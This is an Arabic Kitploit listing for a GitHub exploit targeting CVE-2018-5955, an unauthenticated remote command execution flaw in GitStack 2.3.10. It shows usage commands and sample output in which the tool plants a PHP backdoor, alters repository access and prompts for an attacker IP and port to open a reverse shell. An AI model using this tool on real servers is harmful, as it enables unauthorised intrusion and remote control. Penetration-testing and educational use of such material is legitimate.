Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-5955 — استغلال لثغرة CVE-2018-5955 في GitStack 2.3.10: RCE بدون مصادقة | Kitploit
أدوات/GitHubGitHub/mikethehash/cve-2018-5955
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubmikethehash/cve-2018-5955

CVE-2018-5955

استغلال لثغرة CVE-2018-5955 في GitStack 2.3.10: RCE بدون مصادقة

عرض المستودع
103منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-5955

استغلال لثغرة CVE-2018-5955 في GitStack 2.3.10 - تنفيذ أوامر عن بُعد بدون مصادقة

الاستغلال: GitStack 2.3.10 تنفيذ أوامر عن بُعد بدون مصادقة

التاريخ: 18.01.2018

رابط البرنامج: https://gitstack.com/

مؤلف الاستغلال: Kacper Szurek

الاستغلال الأصلي: https://www.exploit-db.com/exploits/43777

الموقع الإلكتروني: https://security.szurek.pl/

الفئة: remote

CVE: CVE-2018-5955

استغلال معدّل بواسطة MikeTheHash

التاريخ: 23.06.2023

الميزات الجديدة: تفاعل RCE، كشف نظام التشغيل، دالة الصدفة العكسية، تم تكييفه من python2 إلى python3

CVE: CVE-2018-5955

الفئة: remote

إخلاء مسؤولية

أنا لا أتحمل أي مسؤولية عن أفعالك، فقد نشرته على جيثب لأغراض تعليمية أو لاختبار الاختراق المعتمد والمرخّص.

طريقة الاستخدام

تثبيت المتطلبات:

root@kitploit:~
pip install colorama

ثم يمكنك تشغيله باستخدام:

root@kitploit:~
python3 exploit.py

الوظائف

  • كشف نظام التشغيل
  • الصدفة العكسية

كشف نظام التشغيل:

سيتم اكتشاف نظام التشغيل بعد استغلال الثغرة CVE، وسيظهر هذا السطر في المخرجات: "[*] OS: $operatingsystem" (توضيح أدناه)

root@kitploit:~
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----

يمكنك أيضًا كتابة "os" لمعرفة نوع نظام التشغيل.

الصدفة العكسية

للحصول على صدفة عكسية فعلية على الهدف، يمكنك كتابة "shell" ثم إدخال عنوان IP ومنفذ الاستماع الخاص بك كما يلي:

root@kitploit:~
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE

استمتع بالاختراق!

تنزيل الأداة